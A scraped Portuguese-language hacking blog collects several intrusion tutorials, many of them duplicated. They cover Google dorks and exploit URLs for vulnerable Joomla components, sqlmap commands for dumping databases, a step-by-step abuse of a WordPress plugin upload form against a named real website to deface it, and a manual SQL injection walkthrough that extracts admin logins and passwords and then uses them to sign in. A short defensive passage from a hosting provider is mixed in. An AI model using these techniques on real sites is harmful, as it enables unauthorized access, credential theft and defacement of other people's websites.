Olá companheiros , bom iremos ensinar a vocês uma falha de "JOOMLA" .
Essa falha é uma falha muito boa de se praticar.
[ Joomla COM_MEDIA ]
Joomla COM_MEDIA Exploit
[ #Dorks ]
Dork 1: inurl:index.php?option=com_media& site:com
Dork 2: inurl:index2.php?option=com_media& site:net
Dork 3: inurl:option=com_media
[ #Exploit ]
Exploit:
/index.phpoption=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=
( Tecnologia Pen/Test )
TecnologiaPenTest
Técnicas de invasão .
quarta-feira, 17 de julho de 2013
Explorando Contas Em CMSs
Sem exagero, é MUITO, MUITO, MUITO fácil explorar uma conta baseada nestes CMSs. O “trabalho” só não é mais fácil, porque a quantidade de sites existentes feitos em ambos, é muito grande e assim, os invasores não conseguem dar conta de todos. A seguir apenas um link – entre literalmente centenas – em que se pode encontrar um arsenal de ferramentas para explorar um site baseado em Joomla:
http://www.exploit-db.com/
Se você quer fazer parte do grupo daqueles que lutam para melhorar as aplicações, a tarefa não é das mais fáceis, já que ao que parece, os que trabalham para corrigir os problemas não conseguem fazer com que a informação chegue aos interessados de forma tão eficiente. Na verdade, a maior parcela de “culpa” está nas mãos dos usuários destas ferramentas, que deveriam interessar-se mais por repassá-la aos demais.
Veja que, uma pequena pesquisa também revela alguns links que podem ajudar a lidar com os problemas:
JOOMLA
http://www.joomlaclube.com.br/
http:// eunaoqueroumblogue.blogspot.com .br/2013/03/ checklist-de-seguranca-joomla.h tml
WORDPRESS
http://wp-brasil.org/
http://codex.wordpress.org/ pt-br:Blindando_o_WordPress
Apesar da Origiweb adotar precedimentos de segurança nos servidores e atualizar constantemente regras de acesso, é de suma importância que o responsável por uma conta que faça uso do WordPress ou Joomla, assuma o seu papel na adoção de medidas corretivas e preventivas associadas à segurança da plataforma empregada. Por isso, é fundamental que se você tem um site baseado em alguma plataforma OpenSource, mantenha-se informado, atualize frequentemente seu site, pesquise sobre vulnerabilidades e tenha sempre backups frequentes do seu conteúdo em seu computador.
http://www.exploit-db.com/
Se você quer fazer parte do grupo daqueles que lutam para melhorar as aplicações, a tarefa não é das mais fáceis, já que ao que parece, os que trabalham para corrigir os problemas não conseguem fazer com que a informação chegue aos interessados de forma tão eficiente. Na verdade, a maior parcela de “culpa” está nas mãos dos usuários destas ferramentas, que deveriam interessar-se mais por repassá-la aos demais.
Veja que, uma pequena pesquisa também revela alguns links que podem ajudar a lidar com os problemas:
JOOMLA
http://www.joomlaclube.com.br/
http://
WORDPRESS
http://wp-brasil.org/
http://codex.wordpress.org/
Apesar da Origiweb adotar precedimentos de segurança nos servidores e atualizar constantemente regras de acesso, é de suma importância que o responsável por uma conta que faça uso do WordPress ou Joomla, assuma o seu papel na adoção de medidas corretivas e preventivas associadas à segurança da plataforma empregada. Por isso, é fundamental que se você tem um site baseado em alguma plataforma OpenSource, mantenha-se informado, atualize frequentemente seu site, pesquise sobre vulnerabilidades e tenha sempre backups frequentes do seu conteúdo em seu computador.
SQL Map no Kali Linux ~ Tutorial
Eae galera , hoje irei passar os comandos básicos para usar o Sql Map no Kali Linux ;
Vimos que os comandos não mudaram , apenas tiramos as aspas e escrevemos os comandos diretamente facilitando bastante o nosso trabalho .
Abra o Terminal e digite:
cd /usr/share/sqlmap
Os comandos :
sqlmap.py -u url --dbs
sqlmap.py. -u url -D --tables
sqlmap.py -u url -D -T --columns
sqlmap.py -u url -D -T --dump
____________________________________________________________________________________________
:: A url não precisa mais estar entre aspas ''
-D : bd
-T : tabelas
-C : colunas
-dump : pega toda a DB
~~ Obrigado por ver mais um tutorial nosso , agradeçemos sua visita ~~
Vimos que os comandos não mudaram , apenas tiramos as aspas e escrevemos os comandos diretamente facilitando bastante o nosso trabalho .
Abra o Terminal e digite:
cd /usr/share/sqlmap
Os comandos :
sqlmap.py -u url --dbs
sqlmap.py. -u url -D --tables
sqlmap.py -u url -D -T --columns
sqlmap.py -u url -D -T --dump
____________________________________________________________________________________________
:: A url não precisa mais estar entre aspas ''
-D : bd
-T : tabelas
-C : colunas
-dump : pega toda a DB
~~ Obrigado por ver mais um tutorial nosso , agradeçemos sua visita ~~
Joomla com_fabrik Exploit
Nesse post vamos ver um pouco do joomla com_fabrik - Exploit :
Dork 1: inurl:com_fabrik&view=form&
Dork 2: inurl:index.php?option=com_fabrik
Exploit: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Ficando em: http://localhost:8080/media/arquivo.txt
Dork 2: inurl:index.php?option=com_fabrik
Exploit: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
Ficando em: http://localhost:8080/media/arquivo.txt
Upload images ~ Tutorial
Olá estamos aqui para aprender um tutorial , que nos permite á dar um Upload em uma imagem
como se fosse um "deface" . vamos lá.
1ª : Vai no google e busca por esse código :
Codigo: plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1?
2ª : Depois vai aparecer vários sites mais nem todos são vulneraveis
a essa invasão , então vamos fazer com esse site
#SERVE: http://www.thanksjon.ca/
3ª : Ou seja como irá ficar | http://www.thanksjon.ca/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
4ª : Lá terá assim
| Max File Size: 3 MB
Allowable File Types: .jpg .gif
|
Ou seja , você só poderá adicionar images em JPG Ou GIF (mais nem todos sites são esses dois)
5ª : você clica em | escolher arquivo , depois escolhe a imagem e clica em "upload before submitting!"
6ª : Se aparecer o nome dá imagem feita irá ser assim "FOTO.jpg (221 KB) Uploaded " , é porque a imagem foi , então como irá ficar?
7ª : http://www.thanksjon.ca/wp-content/uploads/tdomf/tmp/1/SEUIPAQUI/ONOMEDASUAIMAGEMAQUI.jpg
Depois é só checar se no site upo a imagem.
( Tecnologia Pen/Test )
como se fosse um "deface" . vamos lá.
1ª : Vai no google e busca por esse código :
Codigo: plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1?
2ª : Depois vai aparecer vários sites mais nem todos são vulneraveis
a essa invasão , então vamos fazer com esse site
#SERVE: http://www.thanksjon.ca/
3ª : Ou seja como irá ficar | http://www.thanksjon.ca/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index=
4ª : Lá terá assim
| Max File Size: 3 MB
Allowable File Types: .jpg .gif
|
Ou seja , você só poderá adicionar images em JPG Ou GIF (mais nem todos sites são esses dois)
5ª : você clica em | escolher arquivo , depois escolhe a imagem e clica em "upload before submitting!"
6ª : Se aparecer o nome dá imagem feita irá ser assim "FOTO.jpg (221 KB) Uploaded " , é porque a imagem foi , então como irá ficar?
7ª : http://www.thanksjon.ca/wp-content/uploads/tdomf/tmp/1/SEUIPAQUI/ONOMEDASUAIMAGEMAQUI.jpg
Depois é só checar se no site upo a imagem.
( Tecnologia Pen/Test )
SQLInjection Manual ~ Tutorial
[Portuguese] SQL Injection
_____ ____ _ _____ _ _ _
/ ____|/ __ \| | |_ _| (_) | | (_)
| (___ | | | | | | | _ __ _ ___ ___| |_ _ ___ _ __
\___ \| | | | | | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \
____) | |__| | |____ _| |_| | | | | __/ (__| |_| | (_) | | | |
|_____/ \___\_\______| |_____|_| |_| |\___|\___|\__|_|\___/|_| |_|
_/ |
|__/
Nessa aula estremos aprendendo SQLi, no entanto dessa vez estaremos consultado o database Mysql para obter informações de login e senha.
Aqui esta o site: www.site.com.br/noticias.php?id=10
Para descobrir se pode estar vulneravel, coloque ' depois do link, caso dei algum erro tem grande chance de estar vulneravel.
www.site.com.br/noticias.php?id=10'
Um exemplo de erro: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/site/public_html/noticias/index.php on line 282
Essa falha é baseada em erros.
Vamos pegar o numero de colunas usando ORDER BY *
É usado dessa maneira:
+order+by+1 //Sem erro
+order+by+2 //Sem erro
+order+by+3 //Sem erro
+order+by+4 //Sem erro
+order+by+5 //Sem erro
+order+by+6 //Erro
www.site.com.br/noticias.php?id=10+order+by+5
Então são apenas 5 colunas
Vamos uni-las, usando UNION ALL SELECT *
http://www.site.com.br/noticias.php?id=10+union+all+select+1,2,3,4,5
Coloque um traço (-) antes do valor da variavel ficando assim:
http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,3,4,5
Irão aparecer numeros, eles que nóis iremos subtituir por informações:
Precisamos encontrar a tabela do login agora, podemos usar Brute Force, ou então information_schema. O information_schema só funciona em databases MYSQL acima de versão acima de 5.0, para descobrir a versão use: version()
+union+all+select+1,version(),3
//--Brute Force--\\
Vamos tentar colocar tabelas até que não apareça erro:
UNION ALL SELECT * FROM ADMIN == erro
"" "" "" "" LOGIN == erro
"" "" "" "" USER == erro
"" "" "" "" USERS == erro
"" "" "" "" USUARIOS == sem erro
Então no caso ficaria assim:
http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,3,4,5+from+usuarios
Você pode usar: admin, admins, usuarios, usuario, user, users, user_name, username, login, adm, tb_usuarios, tb_admin ... entre outros.
//--INFORMATION_SCHEMA--\\
DATABASE: INFORMATION_SCHEMA
TABELA: TABLES
COLUNA: TABLE_NAME
Sintaxe = Exemplo: UNION ALL SELECT 1,TABLE_NAME,3 FROM INFORMATION_SCHEMA.TABLES
Para ir passando de tabela você usa LIMIT *
LIMIT 1,1
LIMIT 2,1
LIMIT 3,1
LIMIT 4,1
LIMIT 5,1
... E assim vai indo até encontrar uma tabela de login.
Ex:
http://www.site.com.br/noticias.php?id=-10+union+all+select+1,2,table_name,4,5+from+information_schema.tables+limit+1,1
//
Vamos agora descobrir as colunas de login, você pode usar as mesmas tecnicas de brute force e information_schema, no entanto information_schema é um pouco diferente:
DATABASE: INFORMATION_SCHEMA
TABELLA: COLUMNS
COLUNA: COLUMN_NAME
Sintaxe = Exemplo: UNION ALL SELECT 1,COLUMN_NAME,3 FROM INFORMATION_SCHEMA.COLUMNS
Para passar de coluna pode usar o LIMIT também.
//
Agora continuando suponhamos que eu tenha pegado a tabela USUARIOS e as colunas LOGIN e SENHA, para pegar as informações de login e senha é so digitar eles no seu site, nos numeros visiveis, suponhamos que tenha parecido o 2 e 3 então vamos substituir eles pela informação:
UNION ALL SELECT 1,LOGIN,SENHA,3,4,5 FROM USUARIOS
http://www.site.com.br/noticias.php?id=-10+union+all+select+1,login,senha,4,5+from+usuarios
Agora é só encontrar a area de login, geralmente fica em /admin , /adm/ , /administrator /login.php , ou você pode usar o acunetix ou algum outro tool para encontrar a area de login.
Ao encontra-la é só você se logar com as informações que você pegou
E pronto .
Divulgue-nos -> http://tech-pentest.blogspot.com.br/
Assinar:
Comentários (Atom)